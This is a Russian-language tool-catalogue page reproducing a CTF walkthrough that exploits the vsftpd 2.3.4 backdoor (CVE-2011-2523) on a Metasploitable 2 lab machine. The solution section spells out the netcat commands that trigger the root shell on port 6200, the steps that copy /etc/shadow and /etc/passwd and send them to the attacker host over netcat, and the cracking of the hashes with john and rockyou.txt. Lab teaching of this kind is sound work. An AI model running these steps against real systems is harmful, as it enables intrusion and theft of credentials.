Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CTF---CVE-2011-2523 — Пошаговое прохождение CTF с эксплуатацией бэкдора vsftpd 2.3.4 (CVE-2011-2523) для захвата и взлома /etc/shadow и /etc/passwd из Metasploitable 2. | Kitploit
Инструменты/GitHubGitHub/xiangsi-howard/ctf---cve-2011-2523
Взлом паролейРазведкаАнализ уязвимостейЭксплуатацияСбор информацииCTFТестирование на ПроникновениеОбучение и Образование

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
xiangsi-howard/ctf---cve-2011-2523

CTF---CVE-2011-2523

Пошаговое прохождение CTF с эксплуатацией бэкдора vsftpd 2.3.4 (CVE-2011-2523) для захвата и взлома /etc/shadow и /etc/passwd из Metasploitable 2.

Репозиторий
53 лет назадЕщё не проверено

Сценарий «Захват флага» - CVE-2011-2523

Захватите расшифрованный файл /etc/shadow и /etc/passwd с уязвимого сервера Metasploitable 2.

Настройка окружения

Шаг 1: Загрузите и распакуйте виртуальную машину

Для этого CTF мы используем VMware Workstation Pro с двумя виртуальными машинами. Kali Linux выступает в роли машины атакующего, а Metasploitable 2 — в роли уязвимой машины.

  • Загрузите и установите VMware Workstation: https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html
  • Загрузите и извлеките виртуальную машину Kali Linux: https://www.kali.org/get-kali/
  • Загрузите и извлеките виртуальную машину Metasploitable 2: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

Шаг 2: Откройте виртуальные машины Kali Linux и Metasploitable 2 в VMware из извлечённого файла

  • Выберите пункт Open a Virtual Machine в VMware Workstation и укажите распакованный файл Kali Linux
  • Щёлкните правой кнопкой мыши по боковой панели и выберите пункт open, затем укажите распакованный файл Metasploitable 2
  • Нажмите кнопку Play virtual machine на обеих виртуальных машинах
  • Когда появится запрос выбрать вариант I moved It или I copied It, выберите I copied It

Шаг 3: Вход

  • Войдите в Kali Linux, используя kali в качестве имени пользователя и пароля
  • Войдите в Metasploitable, используя msfadmin в качестве имени пользователя и пароля

Шаг 4: Запишите IP-адрес виртуальной машины Metasploitable

  • Выполните ip addr show и запишите IP-адрес из раздела inet

Решение

Massachusetts Institute of Technology Research and Engineering описывает CVE-2011-2523 как распространённую уязвимость, при которой vsftpd 2.3.4 downloaded between 20110630 and 20110703 contains a backdoor which opens a shell on port 6200/tcp.

Шаг 1: Найдите открытые порты на машине Metasploitable с помощью службы FTP

  • nmap <vulnerable-machine-ip-address>
  • сканирование nmap должно показать открытый порт 21, использующий службу ftp

Шаг 2: Попробуйте подключиться к открытому порту с помощью NetCat

  • nc <vulnerable-machine-ip-address> 21
  • Имя пользователя — любая строка с :) на конце, введите user <string>:)
  • Когда появится запрос пароля, введите любую строку pass <string>
  • Затем завершите соединение с помощью ^C [CTRL + C] — на порту 6200 открывается оболочка с root-доступом к Metasploitable.

Шаг 3: Подключитесь к оболочке на порту 6200 уязвимой машины

  • nc -v <vulnerable-machine-ip-address> 6200
  • Покажите IP-адрес текущего соединения: ip addr show
  • Покажите, что предоставлен root-доступ, с помощью whoami

Шаг 4: Скопируйте файлы /etc/shadow и /etc/passwd в другой файл

  • cp /etc/shadow shadow.txt
  • cp /etc/passwd passwd.txt

Шаг 5: Отправьте скопированные файлы на машину Kali Linux с помощью NetCat

  • На машине атакующего найдите IP-адрес в разделе inet с помощью команды ip addr show
  • Прослушивайте файлы на машине атакующего с помощью nc -l -p 1234 > shadow.txt
  • В root-оболочке на Metasploitable выполните nc -w 3 <destination-ip> 1234 < shadow.txt
  • Повторите для файла passwd

Шаг 5: Преобразуйте файл shadow в формат инструмента John

  • unshadow passwd.txt shadow.txt > unshadowed-input
  • Просмотрите файл с помощью cat unshadowed-input — в нём должны храниться имя пользователя и пароль

Шаг 6: Расшифруйте файл shadow с помощью команды John и словаря

  • Используйте словарь rockyou.txt для взлома хэшей с помощью john
  • Распакуйте файл словаря в Kali Linux: sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
  • Когда появится запрос пароля, используйте пароль администратора по умолчанию для Kali Linux — kali
  • Взломайте хэши: john unshadowed-input –wordlist=/usr/share/wordlists/rockyou.txt
  • Просмотрите взломанные пароли: john –show unshadowed-input
Скачать инструмент